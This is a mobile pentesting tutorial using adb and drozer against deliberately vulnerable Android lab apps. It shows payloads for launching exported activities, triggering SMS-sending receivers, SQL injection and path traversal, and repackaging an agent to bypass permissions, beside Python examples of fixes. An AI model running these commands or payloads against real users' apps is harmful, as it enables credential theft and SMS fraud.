Mobile Application Pentesting-Part4

Piyush Patil
May 17, 2019 · 8 min read

Access Control Issues

Part 1- Intent Filter Vulnerability

- The application lets the user view the API credentials by pressing a button:

Now, our goal is to access this information without clicking that button. Let's see how to do it.

cat AccessControl1Activity.java

The action "jakhar.aseem.diva.action.VIEW_CREDS" is the intent filter responsible for letting the application display the credentials.

Also, the AndroidManifest.xml indicates the presence of the mentioned intent filter:

If you look at the above piece of code, the activity is "protected" with an intent filter. An intent filter must not be treated as a protection mechanism: when an intent filter is declared on an application component such as an activity, the component is exported by default, so any application on the device can invoke it. That is exactly why this activity is vulnerable.

Using the Activity Manager tool, we can trigger the jakhar.aseem.diva.action.VIEW_CREDS intent filter without going through the DIVA user interface:

adb shell am start -a jakhar.aseem.diva.action.VIEW_CREDS

am: Activity Manager tool

start: To Launch an activity

The result is the application starting by itself and showing the API credentials:


DROZER

https://labs.mwrinfosecurity.com/tools/drozer/

Install the drozer console on Linux and the drozer agent on the Android device.

Drozer mobile-agent

We will perform mobile pentesting with drozer against the InsecureBank vulnerable application.

https://github.com/dineshshetty/Android-InsecureBankv2

Drozer Commands

run - Executes a drozer module.

list - Shows a list of all drozer modules that can be executed in the current session. This hides modules that you do not have suitable permissions to run.

shell - Starts an interactive Linux shell on the device, in the context of the Agent process.

cd - Mounts a particular namespace as the root of the session, to avoid having to repeatedly type the full name of a module.

clean - Removes temporary files stored by drozer on the Android device.

contributors - Displays a list of people who have contributed to the drozer framework and the modules in use on your system.

echo - Prints text to the console.

exit - Terminates the drozer session.

help - Displays help about a particular command or module.

load - Loads a file containing drozer commands and executes them in sequence.

module - Finds and installs additional drozer modules from the Internet.

permissions - Displays a list of the permissions granted to the drozer Agent.

set - Stores a value in a variable that will be passed as an environment variable to any Linux shells spawned by drozer.

unset - Removes a named variable that drozer passes to any Linux shells that it spawns.

Let's start

ls => to see all available commands

run <module_name> => to run any module

To get a list of all packages present on the device:

dz> run app.package.list

To search for a package name in the above list:

dz> run app.package.list -f <your_string>

To get basic info about a selected package:

dz> run app.package.info -a <package_name>


AttackSurface

This is where we start exploring vulnerabilities. We begin by checking the number of exported Activities, Broadcast Receivers, Content Providers and Services:

run app.package.attacksurface <package_name>
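The view that app.package.attacksurface produces can be rebuilt offline from a decoded AndroidManifest.xml. The script below is an added example written for this article (it is not drozer's code and not taken from DIVA or InsecureBank): it applies the rule from the intent-filter section above (an explicit android:exported wins; otherwise a component with an <intent-filter> is exported) to a constructed sample manifest, lists every exported component, and for a component guarded by a custom permission reports whether that permission's protectionLevel is signature, which is the condition the Content Provider signature section later depends on. Every package, component and permission name in the sample is made up.

```python
# Added example for this article (not drozer's code and not from DIVA/InsecureBank):
# rebuild the "attack surface" view from a decoded AndroidManifest.xml.
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed sample manifest; every name in it is made up for the example.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.bank">
  <permission android:name="com.example.bank.READ_DB"
              android:protectionLevel="normal"/>
  <application>
    <activity android:name=".ChangePassword" android:exported="true"/>
    <activity android:name=".APICreds">
      <intent-filter>
        <action android:name="com.example.bank.action.VIEW_CREDS"/>
        <category android:name="android.intent.category.DEFAULT"/>
      </intent-filter>
    </activity>
    <activity android:name=".Login" android:exported="false">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
      </intent-filter>
    </activity>
    <receiver android:name=".MyBroadCastReceiver" android:exported="true">
      <intent-filter>
        <action android:name="theBroadcast"/>
      </intent-filter>
    </receiver>
    <provider android:name=".DBContentProvider"
              android:authorities="com.example.bank.provider"
              android:exported="true"
              android:permission="com.example.bank.READ_DB"/>
    <service android:name=".SyncService"/>
  </application>
</manifest>
"""

COMPONENT_TAGS = ("activity", "activity-alias", "receiver", "provider", "service")


def is_exported(component):
    """Platform rule the article relies on: an explicit android:exported wins;
    without it, a component that declares an <intent-filter> is exported.
    (Providers on targetSdk < 17 were exported by default even without a
    filter; that legacy case is not modelled here.)"""
    explicit = component.get(ANDROID + "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    return component.find("intent-filter") is not None


def custom_permission_levels(root):
    """Map each custom <permission> declared in the manifest to its
    protectionLevel; Android treats a missing protectionLevel as 'normal'."""
    return {
        p.get(ANDROID + "name"): p.get(ANDROID + "protectionLevel", "normal")
        for p in root.iter("permission")
    }


def attack_surface(manifest_xml):
    """Return one finding per exported component: its kind, name, the
    permission guarding it (if any) and a verdict a reviewer can act on."""
    root = ET.fromstring(manifest_xml)
    levels = custom_permission_levels(root)
    findings = []
    for tag in COMPONENT_TAGS:
        for comp in root.iter(tag):
            if not is_exported(comp):
                continue
            perm = comp.get(ANDROID + "permission")
            if perm is None:
                verdict = "exported without permission"
            elif perm not in levels:
                verdict = "exported, guarded by a permission declared elsewhere; check its protectionLevel"
            elif "signature" in levels[perm]:
                verdict = "exported, signature-protected"
            else:
                verdict = f"exported, guarded by {perm} (protectionLevel {levels[perm]}, not signature)"
            findings.append({"kind": tag, "name": comp.get(ANDROID + "name"),
                             "permission": perm, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in attack_surface(SAMPLE_MANIFEST):
        print(f"{f['kind']:<9} {f['name']:<22} {f['verdict']}")
```

Run it against the XML that apktool decodes for a real app and compare the output with drozer's: a component that drozer lists but the script does not usually means an implicit export rule (such as the old provider default) that the simple rule above does not cover.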


Activities Enumeration

To get a list of activities from a package:

dz> run app.activity.info -a <package_name>

To launch any selected activity

dz> run app.activity.start --component <package_name> <activity_name>

The screen you are seeing lets you change the password without authenticating to the application. In this specific case, another person would need physical access to the device to change the password. However, there are cases where parameters can be passed to the launched activity, and the activity then operates on those parameters. Keep that in mind when evaluating real-world applications: reading the source code of each exported activity is warranted to determine whether it reads any parameters from the intent used to launch it.

Exploiting android broadcast receiver

As you can see, MyBroadCastReceiver processes actions named theBroadcast; it is exported and not protected by a permission, meaning that any app can create an Intent that triggers this receiver. To determine what this receiver can do, we need to look at the source code.

If we look into the source code, we see that two parameters are retrieved from the Intent:

String str1 = paramIntent.getStringExtra("phonenumber");

String str2 = paramIntent.getStringExtra("newpass");

Then the code reads data stored in SharedPreferences, performs some cryptographic operations, and finally calls SmsManager.sendTextMessage().

run app.broadcast.send --action theBroadcast --extra string phonenumber 12345 --extra string newpass fakefakefake

If we look at our Android device now, we will see that an SMS message is about to be sent. Setting a premium-rate SMS number and forcing users to send messages without their consent is one of the ways criminals make money:


Content Provider Enumeration

To get info about the content providers:

dz> run app.provider.info -a <package_name>

The above content provider is named DBContentProvider, which we can assume is a database-backed content provider. It is very hard to guess the content URIs; however, drozer provides a scanner module that combines various ways of guessing paths and derives a list of accessible content URIs. We can get the content URIs as follows:

To get the content URIs for the selected package:

dz> run scanner.provider.finduris -a <your_package>

We can now use other drozer modules to retrieve information from those content URIs, or even modify the data in the database.

To retrieve or modify data using the above content URIs:

dz> run app.provider.query content://blahblahblah --vertical

The InsecureBank app has no content-provider-related vulnerability, so let's take the Sieve app, which is vulnerable to this attack.

Checking for SQL injection and directory traversal

SQL INJECTION

run scanner.provider.injection -a com.mwr.example.sieve

run app.provider.query content://blahblahblah --projection "'"

run app.provider.query content://blahblahblah --projection "* FROM SQLITE_MASTER WHERE type='table';--"

Or you can try manual injection in the username and password fields, for example:

username=piyush'or'1'='1' --

password=anything
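Why the two --projection payloads above behave as they do becomes clear once you see how a database-backed provider typically assembles its query. The following is an added example written for this article (not Sieve's code and not drozer's): a Python sqlite3 model of a provider's query() that pastes the caller's projection into "SELECT <projection> FROM <table>", run against a constructed in-memory database with made-up table names, beside a fixed version that whitelists column names and binds values as parameters.

```python
# Added example for this article (not Sieve's code and not drozer's): a Python
# sqlite3 model of a database-backed content provider's query() that shows why
# the two --projection payloads behave as they do, beside a fixed version.
import sqlite3


def make_db():
    """Constructed in-memory store standing in for the provider's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, username TEXT)")
    db.execute("CREATE TABLE Key (_id INTEGER PRIMARY KEY, Password TEXT, pin TEXT)")
    db.execute("INSERT INTO Passwords (service, username) VALUES ('mail', 'alice')")
    db.execute("INSERT INTO Key (Password, pin) VALUES ('s3cret', '1234')")
    return db


def vulnerable_query(db, projection, selection=None):
    """The anti-pattern: projection and selection from the caller are pasted
    straight into 'SELECT <projection> FROM Passwords WHERE <selection>'."""
    cols = ", ".join(projection) if projection else "*"
    sql = f"SELECT {cols} FROM Passwords"
    if selection:
        sql += f" WHERE {selection}"
    return db.execute(sql).fetchall()


ALLOWED_COLUMNS = ("_id", "service", "username")


def hardened_query(db, projection, username=None):
    """Fix: accept only known column names for the projection and bind the
    caller's values as parameters instead of splicing them into the SQL."""
    cols = list(projection) if projection else list(ALLOWED_COLUMNS)
    unknown = [c for c in cols if c not in ALLOWED_COLUMNS]
    if unknown:
        raise ValueError(f"rejected projection column(s): {unknown}")
    sql = f"SELECT {', '.join(cols)} FROM Passwords"
    params = ()
    if username is not None:
        sql += " WHERE username = ?"
        params = (username,)
    return db.execute(sql, params).fetchall()


def demo():
    """Run the article's two probes against both implementations."""
    db = make_db()
    # --projection "'" : a lone quote breaks the statement, which is how
    # scanner.provider.injection notices the input reaches the SQL parser.
    try:
        vulnerable_query(db, ["'"])
        error_probe = "no error"
    except sqlite3.OperationalError:
        error_probe = "syntax error leaked"
    # --projection "* FROM SQLITE_MASTER WHERE type='table';--" : the comment
    # marker swallows the real FROM clause and the schema comes back instead.
    payload = ["* FROM SQLITE_MASTER WHERE type='table';--"]
    leaked_tables = sorted(row[1] for row in vulnerable_query(db, payload))
    try:
        hardened_query(db, payload)
        hardened_blocked = False
    except ValueError:
        hardened_blocked = True
    return {"error_probe": error_probe,
            "leaked_tables": leaked_tables,
            "hardened_blocked": hardened_blocked,
            "legit_result": hardened_query(db, ["username"], "alice")}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On Android the equivalent fix is to validate the projection against a known column map and hand the selection arguments to the query API as bound parameters rather than formatting them into the string; the whitelist is what stops the sqlite_master payload, since "* FROM SQLITE_MASTER ..." is not a column name.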

DIRECTORY TRAVERSAL

run scanner.provider.traversal -a com.mwr.example.sieve

run app.provider.read content://blahblahblah/../../../../../mnt/sdcard/trytoaccessanything

To read files from the file system:

dz> run app.provider.read <URI>

To download content from a file:

dz> run app.provider.download <URI>


Content Provider signature Vulnerability

Developers use a custom permission to keep the content provider from being accessible, but that alone is not sufficient; make sure the permission is protected at signature level.

run app.provider.query content://blahblahblah

It says that in order to open this content provider you need this permission: android.permission.CONFIGURE_SIP

Let's decompile the application:

apktool d appname.apk

Go into AndroidManifest.xml, copy the required permission (android.permission.CONFIGURE_SIP) together with its dependencies, such as the strings.xml variables it references, and paste them into the drozer agent's AndroidManifest.xml.

apktool d agent.apk

Copy the permission ,android.permission.CONFIGURE_SIP into the agent.apk’s AndroidManifest.xml file.

apktool b agent/ -o new_agent.apk

Sign the new new_agent.apk.

Signing Android Applications

- No certificate authority, unlike iOS

- Developers generate their own certificates

- The app carries the developer's public key (certificate), whereas the private key stays with the developer.

keytool -genkey -v -keystore name_of_keystore -alias your_alias -keyalg RSA -keysize 2048 -validity number_of_days

keytool -genkey -v -keystore lol.keystore -alias piyush -keyalg RSA -keysize 2048 -validity 365

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore name_of_your_keystore your_application.apk your_key_alias

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore lol.keystore new.apk piyush

jarsigner -verify -verbose your_app.apk

Printing the Signatures

keytool -printcert -file META-INF/RELEASE.RSA

META-INF/RELEASE.RSA => this file appears when you unzip (unzip app.apk -d folder) any Android application. The name of the RSA file can differ.

Now try the same again:

run app.provider.query content://blahblahblah

It worked.


Read Based content provider Vulnerability

run app.package.attacksurface <package_name>

run app.package.info -a <package_name> => shows the app's permissions

So this app only has permission to use the internet.

Let's take another app, Adobe Reader.

This app has permission to read from external storage.

run app.provider.read content://blahblahblah/../../../../../mnt/sdcard/secret.txt

[path traversal vulnerability]
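The traversal commands in the DIRECTORY TRAVERSAL section and the Adobe Reader read above both abuse the same weakness: a provider's openFile() resolves the URI path beneath a base directory without checking where the result lands. The following is an added example written for this article (not Sieve's, Adobe Reader's or drozer's code): a Python model of that openFile() logic on a constructed temporary directory layout, first as written in vulnerable apps, then with the canonical-path check that stops the ../ segments.

```python
# Added example for this article (not Sieve's, Adobe Reader's or drozer's code):
# a Python model of a content provider's openFile() that resolves the URI path
# under a base directory, first as written in vulnerable apps, then with the
# canonical-path check that stops ../ traversal.
import os
import tempfile


def vulnerable_open(base_dir, uri_path):
    """Mirrors `new File(baseDir, uri.getPath())`: Java's File(parent, child)
    joins the two even when child starts with '/', so the '..' segments in the
    request walk out of base_dir."""
    target = os.path.join(base_dir, uri_path.lstrip("/"))
    with open(target, "rb") as fh:
        return fh.read()


def hardened_open(base_dir, uri_path):
    """Canonicalise both sides (like File.getCanonicalPath()) and refuse any
    target that does not stay inside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, uri_path.lstrip("/")))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing path outside provider root: {uri_path}")
    with open(target, "rb") as fh:
        return fh.read()


def demo():
    """Constructed layout: the provider serves app_files/, a secret lives beside it."""
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "app_files")
        sdcard = os.path.join(root, "sdcard")
        os.makedirs(base)
        os.makedirs(sdcard)
        with open(os.path.join(base, "public.txt"), "wb") as fh:
            fh.write(b"hello")
        with open(os.path.join(sdcard, "secret.txt"), "wb") as fh:
            fh.write(b"top secret")
        # Same shape as the article's content://.../../../../mnt/sdcard/secret.txt request
        traversal = "/../sdcard/secret.txt"
        leaked = vulnerable_open(base, traversal)
        try:
            hardened_open(base, traversal)
            blocked = False
        except PermissionError:
            blocked = True
        allowed = hardened_open(base, "/public.txt")
    return {"vulnerable_leaked": leaked,
            "hardened_blocked": blocked,
            "hardened_allowed": allowed}


if __name__ == "__main__":
    print(demo())
```

The check has to run on the canonical path, not on the raw string: rejecting ".." textually misses encoded or symlinked variants, while comparing realpath() results (getCanonicalPath() on Android) catches anything that ends up outside the root.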


Service Enumeration

To interact with the exported services, we can ask drozer for more details about them:

dz> run app.service.info -a <package_name>

Written by Piyush Patil: Reverse Engineering, Penetration Testing (Web, Mobile, IoT, Network, Infra)
